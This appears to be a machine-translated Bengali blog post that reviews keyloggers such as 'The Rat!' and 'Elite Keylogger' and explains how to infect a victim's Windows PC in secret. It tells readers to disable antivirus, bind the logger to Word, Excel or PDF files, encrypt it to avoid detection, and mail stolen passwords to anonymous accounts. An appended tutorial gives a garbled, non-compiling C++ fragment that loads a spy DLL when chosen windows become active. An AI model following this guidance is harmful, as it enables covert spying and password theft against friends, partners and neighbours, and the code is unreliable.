আমাদের মধ্যে কে অন্তত একবার একজন দুর্দান্ত হ্যাকারের মতো অনুভব করতে চায় না এবং অন্তত কিছু ভাঙতে চায় না? :) এমনকি যদি না হয়, তাহলে আপনার মেইল/সোশ্যাল নেটওয়ার্ক থেকে পাসওয়ার্ড পাওয়া কতটা ভালো হবে সে সম্পর্কে কথা বলা যাক। একজন বন্ধু, স্ত্রী/স্বামী, রুমমেটের নেটওয়ার্ক সবাই অন্তত একবার ভেবেছিল। :) হ্যাঁ, এবং আপনি কোথাও শুরু করতে হবে, সব পরে! আক্রমণের (হ্যাকিং) একটি উল্লেখযোগ্য অংশ তথাকথিত কী-লগার (স্পাইওয়্যার) দ্বারা শিকারের কম্পিউটারকে সংক্রমিত করা জড়িত।
সুতরাং, আজকের নিবন্ধে আমরা কী তা নিয়ে কথা বলব উইন্ডোজ-ভিত্তিক কম্পিউটার নিরীক্ষণের জন্য বিনামূল্যের প্রোগ্রাম, যেখানে আপনি তাদের সম্পূর্ণ সংস্করণগুলি ডাউনলোড করতে পারেন, কীভাবে তাদের দিয়ে একজন শিকারের কম্পিউটারকে সংক্রামিত করবেন এবং তাদের ব্যবহারের বৈশিষ্ট্যগুলি কী কী।
কিন্তু প্রথম, একটি সামান্য ভূমিকা.
keyloggers কি এবং কেন তারা প্রয়োজন?
আমি মনে করি আপনি নিজেই এটা কি অনুমান করেছেন. একটি নিয়ম হিসাবে, এগুলি এমন এক ধরণের প্রোগ্রাম যা লুকানো থাকে (যদিও এটি সর্বদা হয় না) শিকারের কম্পিউটারে ইনস্টল করা হয়, যার পরে এটি এই নোডে একেবারে সমস্ত কীস্ট্রোক রেকর্ড করে। তদুপরি, ক্লিকগুলি ছাড়াও, নিম্নলিখিতগুলি সাধারণত রেকর্ড করা হয়: ক্লিকের তারিখ এবং সময় (ক্রিয়া) এবং যে প্রোগ্রামে এই ক্রিয়াগুলি সম্পাদিত হয়েছিল (ব্রাউজার, ওয়েবসাইটের ঠিকানা সহ (হুররে, আমরা অবিলম্বে পাসওয়ার্ডগুলি দেখতে পাই) জন্য আছে!); স্থানীয় অ্যাপ্লিকেশন; সিস্টেম পরিষেবা (উইন্ডোজ লগইন পাসওয়ার্ড সহ) ইত্যাদি।
এখান থেকে একটি সমস্যা অবিলম্বে দৃশ্যমান: আমি কয়েক মিনিটের জন্য আমার প্রতিবেশীর কম্পিউটারে অ্যাক্সেস পেয়েছি এবং আমি ভিকে থেকে তার পাসওয়ার্ড পেতে চাই! আমি অলৌকিক প্রোগ্রাম ইনস্টল এবং কম্পিউটার ফিরে. আমি কিভাবে পরে পাসওয়ার্ড খুঁজতে পারি? আবার তার কাছ থেকে কম্পিউটার নেওয়ার উপায় খুঁজছেন? ভাল খবর হল: সাধারণত না। বেশিরভাগ কী-লগার শুধুমাত্র স্থানীয়ভাবে অ্যাকশনের সমগ্র জমে থাকা ডাটাবেস সঞ্চয় করতে সক্ষম নয়, দূরবর্তীভাবে পাঠাতেও সক্ষম। লগ পাঠানোর জন্য অনেক বিকল্প আছে:
- একটি নির্দিষ্ট ই-মেইল (অনেকগুলি হতে পারে) সবচেয়ে সুবিধাজনক বিকল্প;
- FTP সার্ভার (যার আছে);
- SMB সার্ভার (বহিরাগত, এবং খুব সুবিধাজনক নয়)।
- একটি নির্দিষ্ট ফ্ল্যাশ ড্রাইভ (আপনি এটি শিকারের কম্পিউটারের USB পোর্টে ঢোকান, এবং সমস্ত লগ সেখানে স্বয়ংক্রিয়ভাবে অদৃশ্য মোডে অনুলিপি করা হয়!)
কেন এই সব প্রয়োজন? আমি মনে করি উত্তর সুস্পষ্ট. পাসওয়ার্ড চুরি করা ছাড়াও, কিছু কী-লগার অন্যান্য অনেক সুন্দর জিনিস করতে পারে:
- নির্দিষ্ট সামাজিক নেটওয়ার্কে চিঠিপত্র লগিং. নেটওয়ার্ক বা ইনস্ট্যান্ট মেসেঞ্জার (উদাহরণস্বরূপ, স্কাইপ)।
- স্ক্রিনের স্ক্রিনশট নিচ্ছি।
- ওয়েবক্যাম ডেটা দেখুন/ক্যাপচার করুন (যা খুব আকর্ষণীয় হতে পারে)।
কিভাবে keyloggers ব্যবহার করবেন?
এবং এটি একটি কঠিন প্রশ্ন। আপনাকে বুঝতে হবে যে শুধুমাত্র একটি সুবিধাজনক, কার্যকরী, ভাল কীলগার খুঁজে পাওয়া যথেষ্ট নয়।
তাই, একটি গুপ্তচর প্রোগ্রাম সফলভাবে কাজ করার জন্য কি প্রয়োজন?:
- দূরবর্তী কম্পিউটারে প্রশাসকের অ্যাক্সেস।
তদুপরি, এটি অগত্যা শারীরিক অ্যাক্সেসের অর্থ নয়। আপনি সহজেই এটি আরডিপি (রিমোট ডেস্কটপ সার্ভিস) এর মাধ্যমে অ্যাক্সেস করতে পারেন; টিমভিউয়ার; AmmyAdmin, ইত্যাদি
একটি নিয়ম হিসাবে, সবচেয়ে বড় অসুবিধা এই বিন্দু সঙ্গে যুক্ত করা হয়। যাইহোক, আমি সম্প্রতি উইন্ডোজে প্রশাসকের অধিকার কিভাবে পেতে পারি সে সম্পর্কে একটি নিবন্ধ লিখেছি। - বেনামী ই-মেইল/এফটিপি (যার দ্বারা আপনাকে চিহ্নিত করা হবে না)।
অবশ্যই, আপনি যদি আপনার প্রতিবেশীর জন্য আন্টি শুরা ভঙ্গ করেন তবে এই বিন্দুটি নিরাপদে বাদ দেওয়া যেতে পারে। আপনার কাছে যদি সবসময় শিকারের কম্পিউটার থাকে (আল, আপনার ভাই/বোনের পাসওয়ার্ড খুঁজে বের করুন)। - কর্মক্ষম অ্যান্টিভাইরাস / অভ্যন্তরীণ উইন্ডোজ সুরক্ষা ব্যবস্থার অভাব।
বেশিরভাগ পাবলিক কী-লগার (যা নীচে আলোচনা করা হবে) বেশিরভাগ অ্যান্টিভাইরাস সফ্টওয়্যারগুলির সাথে পরিচিত (যদিও সেখানে লগার ভাইরাস রয়েছে যেগুলি OS কার্নেল বা সিস্টেম ড্রাইভারের মধ্যে তৈরি করা হয়েছে, এবং অ্যান্টিভাইরাসগুলি আর তাদের সনাক্ত করতে বা ধ্বংস করতে পারে না, এমনকি যদি তারা থাকে তাদের সনাক্ত করা হয়েছে)। উপরের কারণে, অ্যান্টি-ভাইরাস সফ্টওয়্যার, যদি থাকে, নির্দয়ভাবে ধ্বংস করতে হবে। অ্যান্টিভাইরাস ছাড়াও, উইন্ডোজ ডিফেন্ডারের মতো সিস্টেমগুলি (এগুলি প্রথমে উইন্ডোজ 7 এবং পরবর্তীতে প্রদর্শিত হয়েছিল) আমাদের স্পাইওয়্যারের জন্যও বিপদ ডেকে আনে৷ তারা একটি কম্পিউটারে চলমান সফ্টওয়্যার সন্দেহজনক কার্যকলাপ সনাক্ত. আপনি সহজেই গুগলে এগুলি থেকে কীভাবে পরিত্রাণ পাবেন সে সম্পর্কে তথ্য পেতে পারেন।
এইগুলি, সম্ভবত, অন্য লোকেদের পাসওয়ার্ড / চিঠিপত্র / ফটো চুরি করার ক্ষেত্রে আপনার সাফল্যের জন্য সমস্ত প্রয়োজনীয় এবং পর্যাপ্ত শর্ত বা আপনি যা কিছু দখল করতে চান।
কি ধরনের স্পাইওয়্যার আছে এবং আমি সেগুলি কোথায় ডাউনলোড করতে পারি?
সুতরাং, আসুন মূল কী-লগারগুলির পর্যালোচনা শুরু করি যা আমি আমার দৈনন্দিন অনুশীলনে তাদের সম্পূর্ণ সংস্করণগুলির বিনামূল্যে ডাউনলোডের লিঙ্কগুলির সাথে শুরু করি (অর্থাৎ, সমস্ত সংস্করণ এই মুহূর্তে সর্বশেষ (যার জন্য এটি একটি নিরাময় খুঁজে পাওয়া সম্ভব) এবং এর সাথে ইতিমধ্যে কাজ এবং পরীক্ষিত ফাটল)।
0. ইঁদুর!
রেটিং (10টির মধ্যে):
- স্টিলথ: 10
- সুবিধা/ব্যবহারযোগ্যতা: 9
- কার্যকারিতা: 8
এটা শুধু একটি বোমা, একটি keylogger না! কাজের অবস্থায় এটি 15-20 KB লাগে। কেন অবাক হবেন: এটি সম্পূর্ণরূপে অ্যাসেম্বলি ভাষায় লেখা হয়েছে (প্রবীণ প্রোগ্রামাররা চোখের জল ফেলে) এবং বেশিরভাগই উত্সাহী হ্যাকারদের দ্বারা লেখা, যার কারণে এর গোপনীয়তার স্তরটি কেবল আশ্চর্যজনক: এটি ওএস কার্নেল স্তরে কাজ করে!
এছাড়াও, প্যাকেজটিতে FileConnector অন্তর্ভুক্ত রয়েছে - একটি মিনি-প্রোগ্রাম যা আপনাকে এই কীলগারটিকে একেবারে যেকোনো প্রোগ্রামের সাথে সংযোগ করতে দেয়। ফলস্বরূপ, আপনি প্রায় একই আকারের একটি নতুন exe পাবেন এবং চালু হলে, এটি ঠিক সেই প্রোগ্রামের মতো কাজ করে যার সাথে আপনি এটিকে একত্রে আঠালো! কিন্তু প্রথম লঞ্চের পরে, আপনার কী-লগার স্বয়ংক্রিয়ভাবে অদৃশ্য মোডে ইনস্টল হয়ে যাবে আপনার পূর্বে নির্দিষ্ট করা লগ পাঠানোর পরামিতিগুলির সাথে। সুবিধাজনক, তাই না?
সামাজিক প্রকৌশলের জন্য একটি চমৎকার সুযোগ (একটি ফ্ল্যাশ ড্রাইভে একটি বন্ধুর কাছে একটি গেম ফাইল/প্রেজেন্টেশন আনুন, বা এমনকি একটি ওয়ার্ড ডকুমেন্টও (আমি আপনাকে বলব কিভাবে একটি exe ফাইল তৈরি করতে হয় যা একটি নির্দিষ্ট শব্দ/এক্সেল ফাইল চালু করে) আমার পরবর্তী নিবন্ধ), লঞ্চ, সবকিছু ঠিকঠাক এবং চমৎকার, কিন্তু বন্ধু ইতিমধ্যে অদৃশ্যভাবে সংক্রামিত!) অথবা আপনি এই ফাইলটি কেবল মেইলের মাধ্যমে একজন বন্ধুকে পাঠান (প্রাধান্যত এটি ডাউনলোড করার জন্য একটি লিঙ্ক, যেহেতু আধুনিক মেল সার্ভারগুলি exe ফাইল পাঠানো নিষিদ্ধ করে)। অবশ্যই, ইনস্টলেশনের সময় অ্যান্টিভাইরাস থেকে এখনও একটি ঝুঁকি রয়েছে (তবে এটি ইনস্টলেশনের পরে থাকবে না)।
যাইহোক, অন্য কিছু কৌশলের সাহায্যে আপনি যেকোন লুকানো ইনস্টলেশন ডিস্ট্রিবিউশনকে একসাথে আঠালো করতে পারেন (এগুলি The Rat! এবং Elite keylogger-এ পাওয়া যায়) শুধুমাত্র exe ফাইলগুলির সাথেই নয় (যা এখনও আরও বা কম উন্নত ব্যবহারকারীদের মধ্যে সন্দেহ জাগায়), কিন্তু সাধারণ শব্দ/এক্সেল এমনকি পিডিএফ ফাইলের সাথেও! কেউ কখনও একটি সাধারণ পিডিএফ সম্পর্কে কিছু ভাববে না, তবে এটি এমন নয়! :) কিভাবে এটি করা হয় একটি সম্পূর্ণ পৃথক নিবন্ধের বিষয়. যারা বিশেষভাবে উদ্যোগী তারা আমাকে প্রতিক্রিয়া ফর্মের মাধ্যমে প্রশ্ন লিখতে পারেন। ;)
সামগ্রিকভাবে, ইঁদুর! একটি খুব দীর্ঘ সময় এবং অনেক জন্য বর্ণনা করা যেতে পারে. এটা আমার চেয়ে অনেক ভালো করা হয়েছে। ডাউনলোড লিংকও আছে সেখানে।
1. এলিট কীলগার
রেটিং (10টির মধ্যে):
- স্টিলথ: 10
- সুবিধা/ব্যবহারযোগ্যতা: 9
- কার্যকারিতা: 8
সম্ভবত সেরা keyloggers এক কখনও তৈরি. এর ক্ষমতা, স্ট্যান্ডার্ড সেট ছাড়াও (অ্যাপ্লিকেশান/উইন্ডোজ/সাইটের প্রেক্ষাপটে সমস্ত ক্লিকের বাধা), তাত্ক্ষণিক মেসেঞ্জার বার্তা, ওয়েবক্যাম থেকে ছবি এবং এছাড়াও - যা খুবই গুরুত্বপূর্ণ! - WinLogon পরিষেবা পাসওয়ার্ডের বাধা। অন্য কথায়, এটি উইন্ডোজ লগইন পাসওয়ার্ডগুলিকে বাধা দেয় (ডোমেনগুলি সহ!) এটি সম্ভব হয়েছে সিস্টেম ড্রাইভার স্তরে কাজ করার জন্য এবং এমনকি OS বুট পর্যায়েও লঞ্চ করার জন্য। এই একই বৈশিষ্ট্যের কারণে, এই প্রোগ্রামটি ক্যাসপেরোস্কি এবং অন্যান্য সমস্ত অ্যান্টি-ম্যালওয়্যার সফ্টওয়্যার উভয়ের কাছে সম্পূর্ণরূপে অদৃশ্য থাকে। সত্যি বলতে, আমি এটি করতে সক্ষম একটি একক কীলগারের সাথে দেখা করিনি।
যাইহোক, আপনার নিজেকে খুব বেশি প্রতারিত করা উচিত নয়। ইনস্টলার নিজেই খুব সহজেই অ্যান্টিভাইরাস দ্বারা স্বীকৃত হয় এবং এটি ইনস্টল করার জন্য আপনাকে প্রশাসকের অধিকার এবং সমস্ত অ্যান্টিভাইরাস পরিষেবা নিষ্ক্রিয় করতে হবে। ইনস্টলেশনের পরে, সবকিছু যে কোনও ক্ষেত্রে পুরোপুরি কাজ করবে।
উপরন্তু, বর্ণিত বৈশিষ্ট্য (OS কার্নেল স্তরে কাজ করে) OS সংস্করণের জন্য প্রয়োজনীয়তা প্রবর্তন করে যার উপর কী-লগারগুলি কাজ করবে। সংস্করণ 5-5.3 (যার লিঙ্কগুলি নীচে দেওয়া হয়েছে) উইন্ডোজ 7 সহ সবকিছু সমর্থন করে। Win 8/10, সেইসাথে Windows সার্ভার পরিবার (2003/2008/2012) আর সমর্থিত নয়। সংস্করণ 6 আছে, যা পুরোপুরি কাজ করে, সহ। জয় 8 এবং 10-এ, তবে, একটি ক্র্যাক সংস্করণ খুঁজে পাওয়া বর্তমানে সম্ভব নয়। এটা সম্ভবত ভবিষ্যতে প্রদর্শিত হবে. ইতিমধ্যে, আপনি উপরের লিঙ্ক থেকে Elite keylogger 5.3 ডাউনলোড করতে পারেন।
কোন নেটওয়ার্ক অপারেশন মোড নেই, তাই এটি নিয়োগকর্তাদের (তাদের কর্মচারীদের কম্পিউটার নিরীক্ষণের জন্য) বা মানুষের একটি সম্পূর্ণ গ্রুপের ব্যবহারের জন্য উপযুক্ত নয়।
একটি গুরুত্বপূর্ণ বিষয় হল পূর্বনির্ধারিত সেটিংস সহ একটি ইনস্টলেশন বিতরণ তৈরি করার ক্ষমতা (উদাহরণস্বরূপ, একটি নির্দিষ্ট ইমেল ঠিকানা সহ যেখানে লগগুলি পাঠাতে হবে)। একই সময়ে, শেষে আপনি একটি ডিস্ট্রিবিউশন কিট পাবেন যা চালু হলে একেবারেই কোনো সতর্কতা বা উইন্ডো প্রদর্শন করে না এবং ইনস্টলেশনের পরে এটি নিজেকে ধ্বংস করতে পারে (যদি আপনি উপযুক্ত বিকল্পটি চেক করেন)।
সংস্করণ 5 এর বেশ কয়েকটি স্ক্রিনশট (সবকিছু কতটা সুন্দর এবং সুবিধাজনক তা দেখানোর জন্য):
2. অল-ইন-ওয়ান কীলগার।
রেটিং (10টির মধ্যে):
- স্টিলথ: 3
- সুবিধা/ব্যবহারযোগ্যতা: 9
- কার্যকারিতা: 8
এটি একটি খুব, খুব সুবিধাজনক জিনিস. কার্যকারিতাটি এলিট কীলগারের স্তরে বেশ। গোপনীয়তার সাথে জিনিসগুলি আরও খারাপ হয়। Winlogon পাসওয়ার্ড আর আটকানো হয় না, এটি একটি ড্রাইভার নয়, এবং কার্নেলের মধ্যে তৈরি করা হয় না। যাইহোক, এটি সিস্টেম এবং লুকানো AppData ডিরেক্টরিতে ইনস্টল করা আছে, যা অননুমোদিত ব্যবহারকারীদের কাছে এত সহজে অ্যাক্সেসযোগ্য নয় (যাদের পক্ষে এটি ইনস্টল করা হয়েছে তাদের নয়)। তবুও, অ্যান্টিভাইরাসগুলি শীঘ্রই বা পরে সফলভাবে এটি করে, যা এই জিনিসটিকে বিশেষভাবে নির্ভরযোগ্য এবং নিরাপদ করে না যখন ব্যবহার করা হয়, উদাহরণস্বরূপ, আপনার নিজের ঊর্ধ্বতনদের উপর গুপ্তচরবৃত্তি করার জন্য। ;) এটিকে কিছুতে আটকানো বা অ্যান্টিভাইরাস থেকে লুকানোর জন্য কোডটি এনক্রিপ্ট করা কাজ করবে না।
Win OS এর যেকোনো সংস্করণে কাজ করে (যা চমৎকার এবং ব্যবহারিক)।
বাকিগুলির জন্য, সবকিছু ঠিক আছে: এটি সবকিছু লগ ইন করে (উইন্ডোজ লগইন পাসওয়ার্ড ব্যতীত), এটিকে যে কোনও জায়গায় পাঠায় (ই-মেইল, এফটিপি, ফিক্সড ফ্ল্যাশ ড্রাইভ সহ)। সুবিধার দিক থেকে, সবকিছুই চমৎকার।
3. স্পাইটেক স্পাইএজেন্ট।
রেটিং (10টির মধ্যে):
- স্টিলথ: 4
- সুবিধা/ব্যবহারযোগ্যতা: 8
- কার্যকারিতা: 10
এছাড়াও একটি ভাল keylogger, যদিও সন্দেহজনক গোপনীয়তা সঙ্গে. সমর্থিত OS সংস্করণগুলিও সম্ভব। কার্যকারিতা পূর্ববর্তী বিকল্পগুলির অনুরূপ। একটি নির্দিষ্ট সময়ের পরে (বা একটি পূর্বনির্ধারিত তারিখে পৌঁছানোর পরে) একটি আকর্ষণীয় স্ব-ধ্বংস ফাংশন রয়েছে।
উপরন্তু, একটি ওয়েবক্যাম থেকে ভিডিও রেকর্ড করা এবং একটি মাইক্রোফোন থেকে শব্দ করা সম্ভব, যা খুব জনপ্রিয় হতে পারে এবং যা পূর্ববর্তী দুই প্রতিনিধির কাছে নেই।
অপারেশনের একটি নেটওয়ার্ক মোড রয়েছে, যা কম্পিউটারের সম্পূর্ণ নেটওয়ার্ক নিরীক্ষণের জন্য সুবিধাজনক। যাইহোক, স্টাফকপ এটি রয়েছে (একজন ব্যবহারকারী - একজন ব্যক্তির জন্য এটির অপ্রয়োজনীয়তার কারণে এটি পর্যালোচনাতে অন্তর্ভুক্ত নয়)। সম্ভবত এই প্রোগ্রামটি নিয়োগকর্তাদের জন্য তাদের কর্মীদের উপর গুপ্তচরবৃত্তি করার জন্য আদর্শ (যদিও এই ক্ষেত্রের নেতারা নিঃশর্তভাবে স্টাফকপ এবং ল্যানএজেন্ট - আপনি যদি আইনী সত্তা হন তবে তাদের দিকে তাকাতে ভুলবেন না)। অথবা আপনার সন্তানদের ট্র্যাক রাখতে যারা বসে "প্রাপ্তবয়স্ক সাইট" দেখতে পছন্দ করে। সেগুলো. যেখানে যা প্রয়োজন তা লুকিয়ে রাখা নয়, বরং সুবিধা (একগুচ্ছ সুন্দর লগ রিপোর্ট, ইত্যাদি সহ) এবং নির্দিষ্ট সাইট/প্রোগ্রাম ব্লক করার জন্য কার্যকারিতা (স্পাইএজেন্টেও আছে)।
4. Spyrix ব্যক্তিগত মনিটর.
রেটিং (10টির মধ্যে):
- স্টিলথ: 4
- সুবিধা/ব্যবহারযোগ্যতা: 6
- কার্যকারিতা: 10
কার্যকারিতা পূর্ববর্তী প্রার্থীর স্তরে, তবে গোপনীয়তার সাথে একই সমস্যা। এছাড়াও, কার্যকারিতাটিতে একটি আকর্ষণীয় জিনিস অন্তর্ভুক্ত রয়েছে: কম্পিউটারে ঢোকানো USB ড্রাইভ থেকে ফাইলগুলি অনুলিপি করা, সেইসাথে স্পাইরিক্স ওয়েবসাইটে একটি ওয়েব অ্যাকাউন্টের মাধ্যমে লগগুলির দূরবর্তী দর্শন (তবে আমরা একটি ক্র্যাক সংস্করণ ডাউনলোড করতে যাচ্ছি, তাই এটি হবে না। আমাদের জন্য কাজ)।
5. Spyrix ব্যক্তিগত মনিটর.
রেটিং (10টির মধ্যে):
- স্টিলথ: 3
- সুবিধা/ব্যবহারযোগ্যতা: 6
- কার্যকারিতা: 8
আমি এটি বিস্তারিতভাবে বর্ণনা করব না, কারণ ... এই উদাহরণে এমন কিছু নেই যা পূর্ববর্তী গুপ্তচরদের একজনের কাছে ছিল না, তবে, কেউ এই কীলগার পছন্দ করতে পারে (অন্তত এটির ইন্টারফেসের জন্য)।
আমরা কি দিয়ে শেষ করব?
একটি কীলগার ব্যবহার করার সমস্যাটি প্রযুক্তিগত চেয়ে বেশি নৈতিক এবং এটি আপনার লক্ষ্যগুলির উপর নির্ভর করে।
আপনি যদি এমন একজন নিয়োগকর্তা হন যিনি তার কর্মীদের নিয়ন্ত্রণ করতে চান, তাহলে নির্দ্বিধায় StaffCop সেট আপ করুন, এই ধরনের ক্রিয়াকলাপের জন্য সমস্ত কর্মচারীদের কাছ থেকে লিখিত অনুমতি সংগ্রহ করুন (অন্যথায় আপনাকে এই ধরনের জিনিসগুলির জন্য গুরুতরভাবে চার্জ করা হতে পারে) এবং কাজটি ব্যাগে রয়েছে। যদিও আমি ব্যক্তিগতভাবে আমার কর্মীদের কর্মক্ষমতা বাড়ানোর আরও কার্যকর উপায় জানি।
আপনি যদি একজন নবজাতক আইটি বিশেষজ্ঞ হন যিনি কেবল অনুভব করতে চান যে এটি কাউকে ভাঙতে কেমন লাগে - এবং এই জিনিসটি সাধারণভাবে কীভাবে কাজ করে, তাহলে প্রদত্ত উদাহরণগুলির যেকোনো একটি ব্যবহার করে সামাজিক প্রকৌশল পদ্ধতির সাথে নিজেকে সজ্জিত করুন এবং আপনার বন্ধুদের উপর পরীক্ষা পরিচালনা করুন। যাইহোক, মনে রাখবেন: শিকারদের দ্বারা এই ধরনের কার্যকলাপ সনাক্তকরণ বন্ধুত্ব এবং দীর্ঘায়ুতে অবদান রাখে না। ;) এবং আপনার অবশ্যই আপনার কাজে এটি পরীক্ষা করা উচিত নয়। আমার শব্দগুলি চিহ্নিত করুন: আমার এটির অভিজ্ঞতা রয়েছে। ;)
যদি আপনার লক্ষ্য আপনার বন্ধু, স্বামী, প্রতিবেশীর উপর গোয়েন্দাগিরি করা হয় বা আপনি এমনকি নিয়মিত এবং অর্থের জন্য এটি করেন তবে এটি মূল্যবান কিনা তা নিয়ে সাবধানে চিন্তা করুন। সব পরে, শীঘ্র বা পরে তারা আকর্ষণ করতে পারে। এবং এটি মূল্যবান নয়: "অন্য কারো নোংরা লন্ড্রির মাধ্যমে গজগজ করা একটি আনন্দদায়ক আনন্দ নয়।" আপনার যদি এখনও প্রয়োজন হয় (অথবা আপনি কম্পিউটার অপরাধ তদন্তের ক্ষেত্রে কাজ করেন এবং এই জাতীয় কাজগুলি আপনার পেশাগত দায়িত্বের অংশ), তবে কেবল দুটি বিকল্প রয়েছে: ইঁদুর! এবং এলিট কীলগার। লুকানো ইনস্টলেশন বিতরণের মোডে, শব্দ / এক্সেল / পিডিএফ দিয়ে আঠালো। এবং এটি আরও ভাল, যদি সম্ভব হয়, একটি নতুন ক্রিপ্টর দিয়ে এনক্রিপ্ট করা। শুধুমাত্র এই ক্ষেত্রে আমরা নিরাপদ কার্যক্রম এবং প্রকৃত সাফল্যের গ্যারান্টি দিতে পারি।
তবে যে কোনও ক্ষেত্রে, এটি মনে রাখা উচিত যে কী-লগারগুলির উপযুক্ত ব্যবহার লক্ষ্য অর্জনের একটি ছোট লিঙ্ক (এমনকি একটি সাধারণ আক্রমণ সহ)। আপনার কাছে সর্বদা প্রশাসকের অধিকার থাকে না, আপনার কাছে সর্বদা শারীরিক অ্যাক্সেস থাকে না, এবং সমস্ত ব্যবহারকারী খুলবে না, পড়তে পারবে না এবং আরও অনেক কিছু তাই আপনার সংযুক্তি/লিঙ্কগুলি ডাউনলোড করবে (হ্যালো সোশ্যাল ইঞ্জিনিয়ারিং), অ্যান্টিভাইরাস সবসময় অক্ষম করা হবে না /your keylogger/cryptor সবসময় তাদের কাছে অজানা থাকবে না। এই সমস্ত এবং অনেক অপ্রকাশিত সমস্যা সমাধান করা যেতে পারে, কিন্তু তাদের সমাধান পৃথক নিবন্ধের একটি সম্পূর্ণ সিরিজের বিষয়.
সংক্ষেপে, আপনি সবেমাত্র তথ্য সুরক্ষার জটিল, বিপজ্জনক, কিন্তু অবিশ্বাস্যভাবে আকর্ষণীয় জগতে ডুব দিতে শুরু করেছেন। :)
আন্তরিকভাবে,লাইস্যাক এ.এস.
কীলগার লেখার বিষয়ে
ইতিমধ্যে অনেক বার বলা হয়েছে, কিন্তু তাদের সব
একটি বড় অপূর্ণতা আছে - একটি নিয়ম হিসাবে,
খুব সীমিত জ্ঞান প্রয়োজন
একটি লগ ফাইলে সবকিছু লেখার পরিবর্তে তথ্য,
ব্যবহারকারী কীবোর্ডে যা লিখেছেন তা আপনার পক্ষে অসম্ভব
চিন্তা লগ জন্য খাদ্য অনেক দিতে হবে
CS বাজানোর সময় বোতাম টিপে 😉
এটা গুপ্তচর হতে হবে যে অনুসরণ
উন্নত, এবং নির্বোধভাবে সবকিছু লিখুন না
তারা তাকে দেয় :) এমন একটি প্রোগ্রামের নামও
একটি গুপ্তচর তার জিভ ঘুরিয়ে না - এটা প্রায়
ইলেকট্রনিক এজেন্ট 007:-))) উপায়
যাতে প্রোগ্রাম আগ্রহের লগে লিখে
আমাদের অনেক উপাদান আছে। সহজতম -
সক্রিয় উইন্ডো নিয়ন্ত্রণ করুন, যেমন যা
বোতাম এই মুহূর্তে দম বন্ধ হয়ে যাচ্ছে :) কেমন আছেন,
আমি মনে করি, আপনি জানেন, গুপ্তচর সাধারণত গঠিত হয়
এক্সিকিউটেবল ফাইল এবং DLL। এই সত্য কারণে
উইন্ডোতে বার্তা আটকাতে কি
আপনাকে একটি নতুন প্রক্রিয়া তৈরি করতে হবে, এবং সর্বাধিক
এটি করার একটি সুবিধাজনক উপায় হল একটি dll ব্যবহার করা।
অতএব, সক্রিয় করার জন্য
আসলে লগার নিজেই, আপনার এটি সঠিকটিতে প্রয়োজন হবে
DLL লোড করার মুহূর্ত, এবং যখন উইন্ডো সক্রিয় থাকে
অন্য কিছুতে পরিবর্তন করুন - এটি মেমরি থেকে আনলোড করুন।
চলুন ভিজ্যুয়াল ল্যাঙ্গুয়েজে DLL এর সাথে কাজ করার ফাংশন দেখি
সি++। dll মেমরিতে লোড হচ্ছে
ফাংশন hINSTAGE=LoadLibrary("name.dll"), যেখানে hINSTAGE -
মেমরিতে লোড করা একটি DLL এর বর্ণনার মতো,
name.dll - লাইব্রেরির নাম। এটি আনলোড করতে,
একটি ফাংশন আছে FreeLibrary(hINSTAGE);
এখন আমরা আমাদের প্রয়োজনীয় জিনিসগুলি কীভাবে পেতে পারি সে সম্পর্কে
অ্যাপ্লিকেশন উদাহরণস্বরূপ, আমরা জানি যে ব্যবহারকারী
www.mail.ru ওয়েবসাইটের মাধ্যমে মেল পড়ে, তারপর আপনি করতে পারেন
এজেন্টকে কনফিগার করুন যাতে এটি বাধা দেয়
ব্যবহারকারী যখন এটিতে যায় তখন কীস্ট্রোক
ওয়েবসাইট (এটা মনে রাখা উচিত যে কারো কারো মধ্যে
কোনো কীবোর্ড স্পাই অ্যাপ নেই
কাজ করতে পারে, উদাহরণস্বরূপ, ঠিকানা বারে
ইন্টারনেট এক্সপ্লোরার"এ - এটি "ক্র্যাশের দিকে নিয়ে যায়৷
প্রোগ্রামের সমাপ্তি" - আপনি আর কি থেকে এসেছেন
উইন্ডোজ চেয়েছিল :))) এই পদ্ধতির জন্য এটি বেশ
ডায়ালার থেকে পাসওয়ার্ড পড়াও উপযুক্ত
- যদি ব্যবহারকারী প্যারানিয়ায় ভোগেন এবং প্রতিবার
লগইন প্রবেশ করে এবং ম্যানুয়ালি পাস :) অথবা আপনি সত্যিই কি
তিনি আউটলুক বা কি লেখেন তা জানা আকর্ষণীয়
একটি নোটপ্যাডে। এখানে কোডের অংশ যা করে
আমাদের প্রয়োজনের সাথে উইন্ডো শিরোনামের তুলনা।
HINSTAGE hINSTAGE;
যখন (1)
{
//লুপ শুরু করুন।
int SL,ll;
ll=1;
sl=2;
// এর জন্য ভেরিয়েবল
পাল্টাক.
char st;
HWND hw;
//এর সহজতমটি নিয়ে যাওয়া যাক
দ্বারা - অক্ষর দ্বারা স্ট্রিং অক্ষর তুলনা:
ফলস্বরূপ উইন্ডো শিরোনাম এবং আমাদের প্রয়োজন একটি সঙ্গে
লাইন
যখন (ll!=sl)
{
hw=GetForegroundWindow();
GetWindowText(hw,st,128); // পড়ুন
char stt="_এখানে আমরা কাঙ্খিত শিরোনাম লিখি
আমাদের জন্য windows_№1";
sl=strlen(stt);
ll=0;
যখন (stt==st)
//তুলনা করা
অক্ষর দ্বারা লাইন
// যে অবস্থানে থাকবে সেখান থেকে এটি করা আরও সুবিধাজনক
প্রয়োজনীয় একটি মাপসই কিনা পরীক্ষা করুন
// আমরা স্ট্রিংটিকে অন্য স্ট্রিংয়ের অংশ হিসাবে ব্যবহার করতে পারি, আপনি করতে পারেন
// একটি প্রশস্ত ফিল্টার মত কিছু তৈরি করুন।
{
ll++;
}
যদি (ll==sl) ( //যদি স্ট্রিং
১ম লাইনের শেষ পর্যন্ত ম্যাচ -
থামা // প্রক্রিয়া বাধাগ্রস্ত করুন
}
// এবং তাই - যদি
আপনাকে একাধিক উইন্ডোর উপস্থিতি পরীক্ষা করতে হবে।
char stt="_এখানে আমরা কাঙ্খিত শিরোনাম লিখি
আমাদের জন্য windows_No. 2";
sl=strlen(stt);
ll=0;
যখন (stt==st)
{
ll++;
}
যদি (ll==sl) (
থামা // প্রক্রিয়া বাধাগ্রস্ত করুন
}
ক্রমিক চেকিংয়ের পরিবর্তে, আপনি করতে পারেন
তুলনা করার সময় সমান্তরাল করুন
সারি উপাদানগুলির একটি চক্র, যদি অন্তত একটি
ম্যাচ - তারপর DLL গুপ্তচর সক্রিয় করা হয়.
hINSTAGE=LoadLibrary("key1.dll");
এখন আমাদের সব সময় চেক করতে হবে
এই উইন্ডো সক্রিয় থাকে কিনা।
যখন (ll==sl) //বাই
লাইনগুলি মেলে - আমরা জায়গায় ঘুরি
{
hw=GetForegroundWindow();
